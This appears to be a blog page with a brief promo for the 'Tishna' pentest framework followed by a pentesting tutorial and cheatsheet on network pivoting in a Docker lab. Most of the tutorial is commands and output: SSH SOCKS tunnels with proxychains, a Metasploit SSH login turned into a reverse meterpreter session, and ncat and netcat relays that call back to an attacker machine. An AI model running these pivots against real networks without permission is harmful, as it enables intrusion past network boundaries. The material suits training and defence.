• Tishna can perform Scanning & Enumeration as much as possible of target.
• It’s first step to stop cyber criminals by securing your Servers and Web Application Security.
• Tishna is false positive free, when there is something it will show no matter what, if it is not, it will give blank results rather error.

Kali Installation

• git clone https://github.com/haroonawanofficial/Tishna.git
• cd Tishna
• sudo chmod u+x *.sh
• ./Kali_Installer.sh
• Tishna will integrate as system software
• Dependencies will be handled automatically
• Third party software(s)/dependencies/modules will be handled automatically

The post Tishna – Complete Automated Pentest Framework For Servers, Application Layer To Web Security appeared first on Tech Chronicles.

I don’t often come get a chance to use pivot techniques, so I sometimes find myself searching for reminders about various methods and their trade offs.

I put together this list of common pivot techniques I have used, along with a quick to setup docker-compose environment to get you playing with each method quickly.

At the end of the article is a quick look cheatsheet with all the key setup commands for each pivot type.

A Fast Pivot Environment

If you want to play around with the pivots I discuss below, I put together a simple docker environment to play with. It has three machines and two networks. The machines:

• A gateway running SSH with access to public and private networks (like a jump host).
• A host running WebGoat vulnerable webapp on the private network only.
• A Metasploit image on the public network only.

The SSH machine is accessible from localhost on port 20022 instead of 22, but you can also use the metasploit container for all testing.

You can get this environment running with docker and docker compose by checking out the repository, then running docker-compose build and docker-compose up.

Method 1: Pivot with SSH & ProxyChains

This method leverages SSH with dynamic port forwarding to create a socks proxy, with proxychains to help with tools that can’t use socks proxies. You can leverage this tunnel two ways:

• In a tool, configure a SOCKS proxy and point it to the SSH tunnel. This works great in tools that support it like Burp.
• Run a command with proxychains, which tunnels data over the SSH proxy.

This method allows mostly complete access to the target network, with few limitations, and is generally my preferred way to access gated networks. It requires the following pre-conditions to leverage:

• Access on target machine
• SSH service running on target machine and reachable from the attacker machine.
• A password compromise or writing of a public key for entry, to a user that allows remote SSH login.

Non-root accounts may limit some tools from working fully (such as nmap), when creating certain types of packets are root only activities.

Setting up the tunnel

First login with SSH using dynamic port forwarding. Assuming you are using the sample environment:

ssh -D localhost:9000 -f -N pentester@localhost -p 20022

This sets up  an SSH tunnel in the background on local port 9000.

Setup ProxyChains

In /etc/proxychains4.conf (or similar depending on version), add the following to the end of the file:

socks5 127.0.0.1 9000

Run Commands

Here is an nmap scan of the webgoat host. Note I use the network “webgoat” because the docker-compose network sets up this dns name. You could use any normal ip range on the target network instead.

$ proxychains nmap -sV webgoat
Nmap scan report for webgoat (224.0.0.1)
Host is up (0.00027s latency).
rDNS record for 224.0.0.1: all-systems.mcast.net
Not shown: 998 closed ports
PORT     STATE SERVICE    VERSION
8080/tcp open  http-proxy
9001/tcp open  jdbc       HSQLDB JDBC (Network Compatibility Version 2.3.4.0)

Method 2: Pivot With Meterpreter and socks proxy

Some servers don’t run SSH, and I often like to leverage meterpreter once I find an initial entry vector for a variety of reasons. Similar to SSH, meterpreter can become a socks proxy, though I have generally found it less reliable than SSH. If you are using the docker compose file provided, I include a slightly modified metasploit image on the public network.

Unfortunately, socks4 proxies only generally support TCP protocols, and certain kinds of traffic won’t work well, so full nmap and similar tool usage may not be possible.

Setup the connection

We’ll run meterpreter over SSH for this example, but the steps would be the same for any meterpreter session once connected. The below will jump from our machine into the metasploit docker container, start metasploit, and create a meterpreter over SSH connection.

# Create a shell on the metasploit image
$ docker exec -it pivots_metasploit_1 /bin/bash
root@3456fe097a17:/$ msfconsole
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS ssh
RHOSTS => ssh
msf5 auxiliary(scanner/ssh/ssh_login) > set USERNAME pentester
USERNAME => pentester
msf5 auxiliary(scanner/ssh/ssh_login) > set PASSWORD letspivot
PASSWORD => letspivot
msf5 auxiliary(scanner/ssh/ssh_login) > exploit

[+] 172.21.0.2:22 - Success: 'pentester:letspivot' ''
[*] Command shell session 1 opened (172.21.0.3:42077 -> 172.21.0.2:22) at 2019-09-19 12:50:57 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf5 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type           Information                              Connection
  --  ----  ----           -----------                              ----------
  1         shell unknown  SSH pentester:letspivot (172.21.0.2:22)  172.21.0.3:42077 -> 172.21.0.2:22 (172.21.0.2)

msf5 auxiliary(scanner/ssh/ssh_login) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[!] SESSION may not be compatible with this module.
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.21.0.3:4433 
[*] Sending stage (985320 bytes) to 172.21.0.2
[*] Meterpreter session 2 opened (172.21.0.3:4433 -> 172.21.0.2:57642) at 2019-09-19 12:51:09 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                            Connection
  --  ----  ----                   -----------                                            ----------
  1         shell unknown          SSH pentester:letspivot (172.21.0.2:22)                172.21.0.3:42077 -> 172.21.0.2:22 (172.21.0.2)
  2         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 172.20.0.2  172.21.0.3:4433 -> 172.21.0.2:57642 (172.21.0.2)

One slight complication with the docker setup I am showing is the networking. I have setup two internal docker networks, public and private, which in my examples are 172.20.0.0/24 (private) and 172.21.0.0/24 (public). Normally you would use the meterpreter session to enumerate network access, but I am going to skip that here and just setup a proxy to the private network.

Setup and run a socks proxy over meterpreter

Here we add a route to the private network and setup a socks proxy. I change the meterpreter port to the default proxychains port, but you could also use the default port and update /etc/proxychains.conf with the new route if desired.

# In Metasploit
msf5 auxiliary(scanner/ssh/ssh_login) > route add 172.20.0.0/24 2
[*] Route added
msf5 auxiliary(scanner/ssh/ssh_login) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > run -j
[*] Auxiliary module running as background job 3.

[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) > 

### Now in a separate command window, I will create a new session
### on the meterpreter container to use nmap and proxychains
$ docker exec -it pivots_metasploit_1 /bin/bash
root@ffd95ec9ce94:/$ proxychains nmap -sT -P0 -p8080,9001 172.20.0.3
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 7.60 ( https://nmap.org ) at 2019-09-19 13:08 UTC
|S-chain|-<>-127.0.0.1:9050-<><>-172.20.0.3:8080-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-172.20.0.3:9001-<><>-OK
Nmap scan report for 172.20.0.3
Host is up (0.0025s latency).

PORT     STATE SERVICE
8080/tcp open  http-proxy
9001/tcp open  tor-orport

Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds

We have a scan! Note that only a limited number of port scan types work with this method (mostly Syn scans) and I find it tends to be quite slow, so it pays to limit the range of IP’s and ports.

Method 3: Pivot over a Ncat or Netcat relay

If ncat or netcat are installed on the target (they are usually removed during hardening on modern systems), or if you install it yourself on the target, it can be used to setup a tunnel.

Ncat is a good proxy tool from the nmap project, but netcat relays are the least reliable method mentioned here. They may work only for a single request before having to be re-established (or establishing them in a loop on the target machine), and will not work on more than a single port. However, sometimes netcat is all you can use.

Tunnel as http proxy with ncat

ncat can be setup as an http proxy which can be used similar to a socks proxy. Just run the ncat proxy on the target machine, and update the local proxychains config to use an http proxy.

Unfortunately, ncat is almost never going to be installed by default on a target machine, unless someone has also installed nmap there.

## Target machine - setup ncat listener 
pentester@47ab62bc2f3d:~$ ncat -vv --listen 3128 --proxy-type http
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::3128
Ncat: Listening on 0.0.0.0:3128

## attacker machine (metasploit)
root@12f888991729:/$ tail /etc/proxychains.conf -n 3
# defaults set to "tor"
#socks4 	127.0.0.1 9050
http 172.21.0.3  3128 # 172.21.0.3 is the IP of my ssh machine

root@12f888991729:/$ proxychains nmap -sT -P0 -p8080,9001 172.20.0.2
ProxyChains-3.1 (http://proxychains.sf.net)

Starting Nmap 7.60 ( https://nmap.org ) at 2019-09-19 14:26 UTC
|S-chain|-<>-172.21.0.3:3128-<><>-172.20.0.2:8080-<><>-OK
|S-chain|-<>-172.21.0.3:3128-<><>-172.20.0.2:9001-<><>-OK
Nmap scan report for 172.20.0.2
Host is up (0.00057s latency).

PORT     STATE SERVICE
8080/tcp open  http-proxy
9001/tcp open  tor-orport

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

Reverse tunnel a single port with ncat

ncat can also be used to tunnel a single port. In this case, we are using a reverse reach back to connect from target -> attacker. This may be required with some network setups that block incoming connections but allow outgoing.

# On attacker / metasploit machine
$ docker exec -it pivots_metasploit_1 /bin/bash
root@12f888991729:/$ ncat -lv --broker -m2 8080
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: DDD9 4DF0 A7D6 3F08 DB62 51C7 4358 04C6 81BF F05A
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080

# On ssh / box to pivot from
$ ssh pentester@localhost -p 20022
pentester@localhost's password: 
pentester@47ab62bc2f3d:~$ ncat -v metasploit 8080 -c "ncat -v webgoatlocal 8080"
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Connected to 172.21.0.2:8080.

## Attacker machine on a separate bash session - use wget to retrieve page
## I use nmap here, but I can only scan port 8080.
root@12f888991729:/$ nmap -sS -P0 -p8080 localhost

Starting Nmap 7.60 ( https://nmap.org ) at 2019-09-19 13:54 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000098s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Tunnel with netcat

Netcat is similar, but the connection will close on a variety of conditions and need to be restarted, generally after a full connection, including one full HTTP request.

# Make backpipe to pass data around
mknod pivot p
# Setup the listener on pivot machine - forward traffic the
# pivot machine receives on port 8080 to the webgoat server 
# port 8080
nc -l -p 8080 0<pivot | nc webgoatlocal 8080 1>pivot

## On attacker machine (metasploit)
root@12f888991729:/$ wget ssh:8080/WebGoat
Saving to: ‘WebGoat'

Method 4: Installing tools on the target machine

If you are willing to install tools on the target machine, you could install various command line tools (or even visual desktop servers like VNC) and use the pivot box as a “new” attacker machine. This is sometimes the way to go if installing tools on such a device is allowable in the rules of engagement.

One additional proxy tool I will mention under this category is 3proxy, a swiss army knife of a proxy with tons of options. Unfortunately, for linux hosts you will need to build a static binary to deploy (or attempt to build on the target), so is a little less simple to get running.

A Quick Pivot CheatSheet

All of these methods are potentially limited by the permissions on the proxy host – non-root users for instance cannot perform certain types of scans over the proxy.

SSH pivot

ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>

Metasploit with Meterpreter

msf5 >route add <network_to_proxy_in_CIDR_notation> <meterpreter_session_id>
[*] Route added
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > run -j

Ncat HTTP proxy

$ ncat -vv --listen 3128 --proxy-type http

Ncat Port Forwarder

On attacker machine:

$ ncat -lv --broker -m2 <port>

On pivot machine:

$ ncat -v <attacker_ip> <attacker_port> -c "ncat -v <host_to_pivot_to> <port_on_final_target"

Netcat Port Forwarder

On pivot machine:

mknod pivot p
nc -l -p <port_to_listen_on> 0<pivot | nc <ip_to_pivot_to> <port_to_pivot_to> 1>pivot

Proxychains Setup

Install and configure proxychains

tail /etc/proxychains.conf
#socks4 	127.0.0.1 9050
http 172.21.0.3  3128
#<type: http/socks4/socks5> <proxy_host> <proxy_port>

Conclusions

Pivoting is important to know when pentesting networks that have private components, and these techniques are an important consideration when designing network topology. Watching externally facing hosts and jump boxes for pivot techniques is one way to halt attackers at an earlier stage.

The post A Pivot Cheatsheet for Pentesters appeared first on Tech Chronicles.

The post Docker For Pentesting And Bug Bounty Hunting appeared first on Tech Chronicles.